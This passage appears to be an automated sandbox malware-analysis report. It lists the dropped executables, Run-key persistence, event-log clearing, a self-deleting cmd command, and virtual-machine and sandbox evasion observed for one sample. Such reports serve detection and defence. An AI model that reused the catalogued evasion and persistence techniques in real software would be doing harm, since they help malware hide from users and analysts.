Source: C:\Windows\Temp\ .exe	File created: \ .exe
Source: C:\Windows\Temp\ .exe	File created: \ .exe
Source: C:\Windows\Temp\ .exe	File created: \ .exe
Source: C:\Windows\Temp\ .exe	File created: \ .exe
Source: C:\Windows\Temp\ .exe	File created: \ .exe
Source: C:\Windows\Temp\ .exe	File created: \ .exe
Source: C:\Windows\Temp\ .exe	File created: \ .exe
Source: C:\Windows\Temp\ .exe	File created: \ .exe
Source: C:\Windows\Temp\ .exe	File created: \ .exe
Source: C:\Windows\Temp\ .exe	File created: \ .exe
Source: C:\Windows\Temp\ .exe	File created: \ .exe
Source: C:\Windows\Temp\ .exe	File created: \ .exe
Source: C:\Windows\Temp\ .exe	File created: \ .exe
Source: C:\Windows\Temp\ .exe	File created: \ .exe
Source: C:\Windows\Temp\ .exe	File created: \ .exe
Source: C:\Windows\Temp\ .exe	File created: \ .exe
Source: C:\Windows\Temp\ .exe	File created: \ .exe
Source: C:\Windows\Temp\ .exe	File created: \ .exe
Source: C:\Windows\Temp\ .exe	File created: \ .exe
Source: C:\Windows\Temp\ .exe	File created: \ .exe
Source: C:\Windows\Temp\ .exe	File created: \ .exe
Source: C:\Windows\Temp\ .exe	File created: \ .exe
Source: C:\Windows\Temp\ .exe	File created: \ .exe
Source: C:\Windows\Temp\ .exe	File created: \ .exe
Source: C:\Windows\Temp\ .exe	File created: \ .exe
Source: C:\Windows\Temp\ .exe	File created: \ .exe	Jump to behavior
Source: C:\Windows\Temp\ .exe	File created: \ .exe	Jump to behavior
Source: C:\Windows\Temp\ .exe	File created: \ .exe	Jump to behavior
Source: C:\Windows\Temp\ .exe	File created: \ .exe	Jump to behavior
Source: C:\Windows\Temp\ .exe	File created: \ .exe	Jump to behavior
Source: C:\Windows\Temp\ .exe	File created: \ .exe	Jump to behavior
Source: C:\Windows\Temp\ .exe	File created: \ .exe	Jump to behavior
Source: C:\Windows\Temp\ .exe	File created: \ .exe	Jump to behavior
Source: C:\Windows\Temp\ .exe	File created: \ .exe	Jump to behavior
Source: C:\Windows\Temp\ .exe	File created: \ .exe	Jump to behavior
Source: C:\Windows\Temp\ .exe	File created: \ .exe	Jump to behavior
Source: C:\Windows\Temp\ .exe	File created: \ .exe	Jump to behavior
Source: C:\Windows\Temp\ .exe	File created: \ .exe	Jump to behavior
Source: C:\Windows\Temp\ .exe	File created: \ .exe	Jump to behavior
Source: C:\Windows\Temp\ .exe	File created: \ .exe	Jump to behavior
Source: C:\Windows\Temp\ .exe	File created: \ .exe	Jump to behavior
Source: C:\Windows\Temp\ .exe	File created: \ .exe	Jump to behavior
Source: C:\Windows\Temp\ .exe	File created: \ .exe	Jump to behavior
Source: C:\Windows\Temp\ .exe	File created: \ .exe	Jump to behavior
Source: C:\Windows\Temp\ .exe	File created: \ .exe	Jump to behavior
Source: C:\Windows\Temp\ .exe	File created: \ .exe	Jump to behavior
Source: C:\Windows\Temp\ .exe	File created: \ .exe	Jump to behavior
Source: C:\Windows\Temp\ .exe	File created: \ .exe	Jump to behavior
Source: C:\Windows\Temp\ .exe	File created: \ .exe	Jump to behavior
Source: C:\Windows\Temp\ .exe	File created: \ .exe	Jump to behavior
Source: C:\Windows\Temp\ .exe	File created: \ .exe	Jump to behavior
Source: C:\Windows\Temp\ .exe	File created: \ .exe	Jump to behavior
Source: C:\Windows\Temp\ .exe	File created: \ .exe	Jump to behavior
Source: C:\Windows\Temp\ .exe	File created: \ .exe	Jump to behavior
Source: C:\Windows\Temp\ .exe	File created: \ .exe	Jump to behavior
Source: C:\Windows\Temp\ .exe	File created: \ .exe	Jump to behavior
Source: C:\Windows\Temp\ .exe	File created: \ .exe	Jump to behavior

Drops PE files

Source: C:\Windows\SysWOW64\033726\svchost.exe	File created: C:\Windows\SysWOW64\034031\RCX8B31.tmp	Jump to dropped file
Source: C:\Windows\Temp\server.exe	File created: C:\Windows\SysWOW64\033726\svchost.exe	Jump to dropped file
Source: C:\Windows\Temp\server.exe	File created: C:\Windows\SysWOW64\033726\RCX773C.tmp	Jump to dropped file
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	File created: C:\Windows\Temp\ .exe	Jump to dropped file
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	File created: C:\Windows\Temp\server.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\033726\svchost.exe	File created: C:\Windows\SysWOW64\034031\svchost.exe	Jump to dropped file
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	File created: C:\Windows\Temp\v5.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\033726\svchost.exe	File created: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe	Jump to dropped file
Source: C:\Windows\Temp\server.exe	File created: C:\Windows\XXXXXX05CA35CC\svchsot.exe	Jump to dropped file

Drops PE files to the windows directory (C:\Windows)

Source: C:\Windows\SysWOW64\033726\svchost.exe	File created: C:\Windows\SysWOW64\034031\RCX8B31.tmp	Jump to dropped file
Source: C:\Windows\Temp\server.exe	File created: C:\Windows\SysWOW64\033726\svchost.exe	Jump to dropped file
Source: C:\Windows\Temp\server.exe	File created: C:\Windows\SysWOW64\033726\RCX773C.tmp	Jump to dropped file
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	File created: C:\Windows\Temp\ .exe	Jump to dropped file
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	File created: C:\Windows\Temp\server.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\033726\svchost.exe	File created: C:\Windows\SysWOW64\034031\svchost.exe	Jump to dropped file
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	File created: C:\Windows\Temp\v5.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\033726\svchost.exe	File created: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe	Jump to dropped file
Source: C:\Windows\Temp\server.exe	File created: C:\Windows\XXXXXX05CA35CC\svchsot.exe	Jump to dropped file

Source: C:\Windows\Temp\v5.exe

Code function: 2_2_0040597D WSAStartup,StartServiceCtrlDispatcherA,ExitProcess,

2_2_0040597D

Source: C:\Windows\Temp\server.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run XXXXXX05CA35CC	Jump to behavior
Source: C:\Windows\Temp\server.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run XXXXXX05CA35CC	Jump to behavior
Source: C:\Windows\SysWOW64\033726\svchost.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run XXXXXX579E5A5B VVVVVVrr2unw==
Source: C:\Windows\SysWOW64\033726\svchost.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run XXXXXX579E5A5B VVVVVVrr2unw==

Hooking and other Techniques for Hiding and Protection

Deletes itself after installation

Source: C:\Windows\Temp\v5.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c del C:\Windows\temp\v5.exe > nul
Source: C:\Windows\Temp\v5.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c del C:\Windows\temp\v5.exe > nul			Jump to behavior

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Source: C:\Windows\Temp\ .exe	Code function: 5_2_0043D078 MonitorFromWindow,IsIconic,GetWindowPlacement,GetWindowRect,		5_2_0043D078
Source: C:\Windows\Temp\ .exe	Code function: 5_2_0043A8F0 IsIconic,SendMessageA,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetClientRect,DrawIcon,		5_2_0043A8F0

Contains functionality to clear windows event logs (to hide its activities)

Source: C:\Windows\Temp\server.exe

Code function: 3_2_1000A4D0 OpenEventLogA,ClearEventLogA,OpenEventLogA,ClearEventLogA,CloseEventLog,

3_2_1000A4D0

Extensive use of GetProcAddress (often used to hide API calls)

Source: C:\Windows\Temp\v5.exe

Code function: 4_2_00407470 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,socket,inet_addr,sendto,RtlExitUserThread,LoadLibraryA,GetProcAddress,wsprintfA,CreateProcessA,TerminateProcess,Sleep,CreateProcessA,Sleep,TerminateProcess,Sleep,RtlExitUserThread,wsprintfA,Sleep,send,Sleep,RtlExitUserThread,Sleep,LoadLibraryA,GetProcAddress,wsprintfA,wsprintfA,CreateProcessA,Sleep,TerminateProcess,wsprintfA,wsprintfA,wsprintfA,wsprintfA,send,send,Sleep,RtlExitUserThread,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,sendto,socket,sendto,Sleep,RtlExitUserThread,LoadLibraryA,GetProcAddress,wsprintfA,wsprintfA,send,Sleep,send,Sleep,RtlExitUserThread,LoadLibraryA,GetProcAddress,wsprintfA,send,wsprintfA,wsprintfA,send,Sleep,RtlExitUserThread,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,

4_2_00407470

Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\server.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\033726\svchost.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Contain functionality to detect virtual machines

Source: C:\Windows\Temp\ .exe

Code function: 00-05-69 VMWARE, Inc. 00-0C-29 VMware, Inc.

5_2_00405DB0

Contains functionality to detect sleep reduction / modifications

Source: C:\Windows\Temp\server.exe	Code function: 3_2_100022F0		3_2_100022F0
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_100022F0		8_2_100022F0

Contains functionality to detect virtual machines (IN, VMware)

Source: C:\Windows\Temp\server.exe

Code function: 3_2_10001800 in eax, dx

3_2_10001800

Found evasive API chain (may stop execution after checking mutex)

Source: C:\Windows\Temp\v5.exe

Evasive API call chain: CreateMutex,DecisionNodes,Sleep

Found stalling execution ending in API Sleep call

Source: C:\Windows\Temp\server.exe

Stalling execution: Execution stalls by calling Sleep

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Source: C:\Windows\Temp\server.exe

3_2_100018A0

Contains functionality to enumerate running services

Source: C:\Windows\Temp\server.exe	Code function: OpenSCManagerA,OutputDebugStringA,LocalAlloc,LocalAlloc,EnumServicesStatusA,LocalAlloc,lstrlen,LocalAlloc,OpenServiceA,LocalAlloc,QueryServiceConfigA,lstrcat,lstrcat,lstrcat,lstrcat,wsprintfA,wsprintfA,wsprintfA,wsprintfA,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,LocalSize,LocalReAlloc,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,CloseServiceHandle,LocalFree,CloseServiceHandle,LocalReAlloc,		3_2_10010760
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: OpenSCManagerA,OutputDebugStringA,LocalAlloc,LocalAlloc,EnumServicesStatusA,LocalAlloc,lstrlen,LocalAlloc,OpenServiceA,LocalAlloc,QueryServiceConfigA,lstrcat,lstrcat,lstrcat,lstrcat,wsprintfA,wsprintfA,wsprintfA,wsprintfA,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,LocalSize,LocalReAlloc,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,CloseServiceHandle,LocalFree,CloseServiceHandle,LocalReAlloc,		8_2_10010760

Contains functionality to query network adapater information

Source: C:\Windows\Temp\v5.exe	Code function: 6D0C6DE0,LoadLibraryA,6D0C6DE0,LoadLibraryA,6D0C6DE0,GetSystemDefaultUILanguage,memset,_mbscpy,_mbscpy,_mbscpy,_mbscpy,_mbscpy,_mbscpy,_mbscpy,_mbscpy,_mbscpy,_mbscpy,_mbscpy,sprintf,_mbscpy,lstrcpy,RegQueryValueExA,GetSystemInfo,memset,sprintf,_mbscpy,_mbscpy,GlobalMemoryStatusEx,__aulldiv,__aulldiv,wsprintfA,malloc,GetAdaptersInfo,free,malloc,GetAdaptersInfo,strcmp,GetIfTable,??2@YAPAXI@Z,GetIfTable,sprintf,_mbscpy,sprintf,_mbscpy,??3@YAXPAX@Z,free,GetTickCount,	2_2_00406090
Source: C:\Windows\Temp\v5.exe	Code function: GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetSystemDefaultUILanguage,memset,_mbscpy,_mbscpy,_mbscpy,_mbscpy,_mbscpy,_mbscpy,_mbscpy,_mbscpy,_mbscpy,_mbscpy,_mbscpy,sprintf,_mbscpy,lstrcpy,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,GetSystemInfo,memset,sprintf,_mbscpy,_mbscpy,GlobalMemoryStatusEx,__aulldiv,__aulldiv,wsprintfA,malloc,GetAdaptersInfo,free,malloc,GetAdaptersInfo,strcmp,GetIfTable,??2@YAPAXI@Z,GetIfTable,sprintf,_mbscpy,sprintf,_mbscpy,??3@YAXPAX@Z,free,GetTickCount,	4_2_00406090
Source: C:\Windows\Temp\ .exe	Code function: GetAdaptersInfo,GetAdaptersInfo,	5_2_0042E9F0
Source: C:\Windows\Temp\ .exe	Code function: SetTimer,GetAdaptersInfo,	5_2_0042F050

Contains long sleeps (>= 3 min)

Source: C:\Windows\Temp\server.exe	Thread delayed: delay time: 180000	Jump to behavior
Source: C:\Windows\Temp\server.exe	Thread delayed: delay time: 1200000	Jump to behavior
Source: C:\Windows\Temp\server.exe	Thread delayed: delay time: 180000	Jump to behavior
Source: C:\Windows\SysWOW64\033726\svchost.exe	Thread delayed: delay time: 180000
Source: C:\Windows\SysWOW64\033726\svchost.exe	Thread delayed: delay time: 1200000
Source: C:\Windows\SysWOW64\033726\svchost.exe	Thread delayed: delay time: 180000

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\Temp\server.exe	Window / User API: threadDelayed 826	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Window / User API: threadDelayed 504
Source: C:\Windows\System32\conhost.exe	Window / User API: threadDelayed 514

Found decision node followed by non-executed suspicious APIs

Source: C:\Windows\Temp\v5.exe

Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)

Found evasive API chain (may stop execution after checking a module file name)

Source: C:\Windows\Temp\server.exe	Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep
Source: C:\Windows\SysWOW64\033726\svchost.exe	Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep
Source: C:\Windows\Temp\v5.exe	Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep

Found large amount of non-executed APIs

Source: C:\Windows\SysWOW64\033726\svchost.exe

API coverage: 9.0 %

May check if the current machine is a sandbox (GetTickCount - Sleep)

Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_100022F0		8_2_100022F0
Source: C:\Windows\Temp\server.exe	Code function: 3_2_100022F0		3_2_100022F0

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\Temp\server.exe TID: 7476	Thread sleep count: 826 > 30	Jump to behavior
Source: C:\Windows\Temp\server.exe TID: 7476	Thread sleep time: -148680000s >= -30000s	Jump to behavior
Source: C:\Windows\Temp\server.exe TID: 7592	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Windows\Temp\server.exe TID: 7592	Thread sleep time: -1200000s >= -30000s	Jump to behavior
Source: C:\Windows\Temp\server.exe TID: 7592	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Windows\Temp\server.exe TID: 7476	Thread sleep time: -180000s >= -30000s	Jump to behavior
Source: C:\Windows\Temp\v5.exe TID: 7756	Thread sleep count: 116 > 30	Jump to behavior
Source: C:\Windows\Temp\v5.exe TID: 7756	Thread sleep time: -2088000s >= -30000s	Jump to behavior
Source: C:\Windows\Temp\v5.exe TID: 7772	Thread sleep time: -72000s >= -30000s	Jump to behavior
Source: C:\Windows\Temp\v5.exe TID: 7752	Thread sleep count: 59 > 30	Jump to behavior
Source: C:\Windows\Temp\v5.exe TID: 7688	Thread sleep time: -90000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\033726\svchost.exe TID: 7848	Thread sleep count: 75 > 30
Source: C:\Windows\SysWOW64\033726\svchost.exe TID: 7848	Thread sleep time: -13500000s >= -30000s
Source: C:\Windows\SysWOW64\033726\svchost.exe TID: 7868	Thread sleep time: -60000s >= -30000s
Source: C:\Windows\SysWOW64\033726\svchost.exe TID: 7860	Thread sleep count: 253 > 30
Source: C:\Windows\SysWOW64\033726\svchost.exe TID: 7868	Thread sleep time: -1200000s >= -30000s
Source: C:\Windows\SysWOW64\033726\svchost.exe TID: 7848	Thread sleep time: -180000s >= -30000s

Queries keyboard layouts

Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000041C	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00001401	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00003C01	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000C01	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000801	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00002C01	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00003401	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00003001	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00001001	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00001801	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00002001	Jump to behavior
